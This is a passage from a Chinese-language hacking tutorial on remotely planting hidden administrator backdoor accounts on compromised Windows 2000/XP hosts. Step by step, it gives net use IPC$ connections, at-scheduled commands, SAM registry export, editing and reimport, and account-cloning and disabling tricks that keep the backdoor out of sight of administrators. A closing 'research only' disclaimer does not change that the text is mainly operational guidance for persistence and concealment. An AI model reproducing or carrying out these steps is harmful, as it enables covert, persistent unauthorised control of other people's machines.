如何在命令列下遠程建立隱藏的超級使用者

在這裡將用at的命令，因為用at產生的計劃任務是以系統身份啟動並執行，所以也用不到psu.exe程式。為了能夠使用at命令，肉雞必須開

有schedule的服務，如果沒有開啟，可用流光裡帶的工具netsvc.exe或sc.exe來遠程啟動，當然其方法也可以，只要能啟動schedule服

務就行。

對於命令列方式，你可以採用各種串連方式，如用SQLexec串連MSSQL的1433連接埠，也可以用telnet服務，只要以你能得到一個cmdshell

，並且有運行at命令的許可權就可以。

1、首先找到一台肉雞，至於如何來找那不是我這裡所說的話題。這裡先假設找到一台超級使用者為administrator,密碼為12345678的肉

雞，現在我們開始在命令列下遠程為它建立隱藏的超級使用者。（例子中的主機是我的區域網路內的一台主機，我將它的ip地址改為

13.50.97.238,，請勿在互連網上對號入座,以免騷擾正常的ip地址。）

2、先與肉雞建立串連,命令為: net use //13.50.97.238/ipc$ "12345678" /user:"administrator

3、用at命令在肉雞上建立一個使用者(如果at服務沒有啟動，可用小榕的netsvc.exe或sc.exe來遠程啟動):at //13.50.97.238 12:51

c:/winnt/system32/net.exe user hacker$ 1234 /add

建立這個加有$符的使用者名稱，是因為加有$符後，命令列下用net user將不顯示這個使用者，但在帳戶管理器卻能看到這個使用者。

4、同樣用at命令匯出HKEY_LOCAL_MACHINE/sam/sam/Domains/account/users下索引值：at //13.50.97.238 12:55

c:/winnt/regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/account/users/

/e 是regedit.exe的參數，在HKEY_LOCAL_MACHINE/SAM/SAM/Domains/account/users/這個鍵的一定要以/結尾。必要的情況下可以用引

號將"c:/winnt/regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/account/users/"引起來。

5、將肉雞上的hacker.reg下載到本機上用記事本開啟進行編輯命令為：copy //13.50.97.238/admin$/system32/hacker.reg

c:/hacker.reg

修改的方法圖形界中已經介紹過了，這裡就不作介紹了。

6、再將編輯好的hacker.reg拷回肉雞上 copy c:/hacker.reg //13.50.97.238/admin$/system32/hacker1.reg

7、查看肉雞時間：net time //13.50.97.238 然後用at命令將使用者hacker$刪除:

at //13.50.97.238 13:40 net user hacker$ /del

8、驗證hacker$是否刪除:用

net use //13.50.97.238 /del 斷開與肉雞的串連。

net use //13.50.97.238/ipc$ "1234" /user:"hacker$" 用帳戶hacker$與肉雞串連，不能串連說明已刪除。

9、再與肉雞建立串連：net use //13.50.97.238/ipc$ "12345678" /user:"administrator"

再取得肉雞時間，用at命令將拷回肉雞的hacker1.reg匯入肉雞註冊表:

at //13.50.97.238 13:41 c:/winnt/regedit.exe /s hacker1.reg

regedit.exe的參數/s是指安靜模式。

10、再驗證hacker$是否已建立，方法同上面驗證hacker$是否被刪除一樣。

11、再驗證使用者hacker$是否有讀、寫、刪的許可權，如果不放心，你還可驗證是否能建立其它帳戶。

12、通過11可以斷定使用者hacker$具有超級使用者權限，因為最初我用at命令建立它的時候是一個普通使用者，而現在卻具有遠

程讀、寫、刪的許可權。

三、如果肉雞沒有開3389終端服務，而我又不想用命令列，怎麼辦？

這種情況下，你也可以用介面方式來遠程為肉雞建立隱藏的超級使用者。因為regedit.exe、regedt32.exe都有串連網路註冊表的功能，

你可以用regedt32.exe來為遠程主機的登錄機碼設定許可權，用regedit.exe來編輯遠端登錄。帳戶管理器也有一項連另一台電腦的

功能，你可以用帳戶管理器為遠程主機建立和刪除帳戶。具體步聚與上面介紹的相似，我就不多說了，只它的速度實在是令人難以忍受

。

但是這裡有兩個前提：1、先用net use //肉雞ip/ipc$ "密碼" /user:"超級使用者名稱"來與遠程主機建立串連以後，才能用regedit.exe

regedt32.exe及帳戶管理器與遠程主機串連。

2、遠程主機必須開啟遠端登錄服務（沒有開啟的話，你也可以遠程開啟，因為你有超級使用者的密碼了）。

四、利用被禁用的帳戶建立隱藏的超級使用者：

我們可以用肉雞上被禁止的使用者來建立隱藏的超組使用者.方法如下:

1．想辦法查看有哪些使用者被細心的管理員禁止，一般情況下，有些管理員出於安全考慮，通常會將guest禁用，當然了會禁用其它使用者

。在圖形介面下，非常容易，只要在帳戶管理器中就可以看到被禁用的帳戶上有一個紅叉；而在命令列下，我還沒有想到好的辦法，只

能在命令列下用命令："net user 使用者名稱"一個一個來查看使用者是否被禁用。

2．在這裡，我們假設使用者hacker被管理員禁用。首先，我先用小榕的超組使用者複製程式CA.exe，將被禁用的使用者hacker 複製成超級用

戶（複製之後，被禁用的使用者hacker就會自動被啟用了）: CA.EXE //肉雞ip administrator 超級使用者密碼 hacher hacher密碼。

3．如果你現在一個cmdshell，如利用telnet服務或SQLEXEC串連肉雞的msSQL的預設連接埠1433得到的shell都可以，這時你只要輸入命令

：

net user hacker /active:no 這樣使用者hacker就被禁用了（至少表面上是這樣的），當然你也可以將使用者hacher換成其它的被禁用的

使用者。

4．這時如果你在圖形介面下看帳戶管理器中的使用者時,會發現使用者hacker被禁用了，但事實上是這樣的嗎？你用這個被禁用的使用者串連

一下肉雞看看是否能連上？用命令：net user //肉雞ip/ipc$ "hacker密碼" /user:"hacker" 連一連看看。我可以告訴大家，經過我

多次實驗，次次都能成功，而且還是超級使用者權限。

5．如果沒有cmdshell怎麼辦？你可以我上面介紹的at命令來禁用使用者hacker;命令格式：at //肉雞ip 時間 net user hacker

/active:no

6．原理：具體的高深的原理我也說不上來，我只能從最簡單的說。你先在圖形介面下在帳戶管理器中禁用一下超級使用者administrator

看看，肯定會彈出一對話方塊，並禁止你繼續禁用超級使用者administrator，同樣，因為在複製時，hacker在註冊表的"F"鍵被超級使用者

administrator在註冊表的"F"鍵所替代，因而hacker就具有了超級使用者的許可權了，但是由於hacker在註冊表內"C"健還是原來的"C"鍵，

所以hacker還是會被禁用，但是它的超級使用者權限卻不會被禁用，因此被禁用的使用者hacker還是可以串連肉雞，而且還具有超級使用者的

許可權。具體我也說不明白，大家權且這麼理解吧。

五、注意的幾點事項：

1、隱藏的超級使用者建立以後，在帳戶管理器中和命令列下均看不到這個使用者，但這個使用者卻存在。

2、隱藏的超級使用者建立以後，就不能再修改密碼了，因為一旦修改密碼，這個隱藏的超級使用者就會暴露在帳戶管理器中，而且不能刪

除。

3、如在本機上實驗時，最好用系統內建的備份工具先備份好原生“系統狀態”主要是註冊表的備份，因為本人做實驗時，曾出現過

帳戶管理器中看不到任何使用者，組中也看不到任何組的現象，但它們卻存在。幸好我有備份,呵呵。SAM鍵是畢竟系統最敏感的部位。

4、本方法在2000/XP上測試通過，未在NT上測試。本方法僅供研究，請勿將本方法用於破壞上，利用本方法造成嚴重後果者，由使用者

負責，本人概不負責。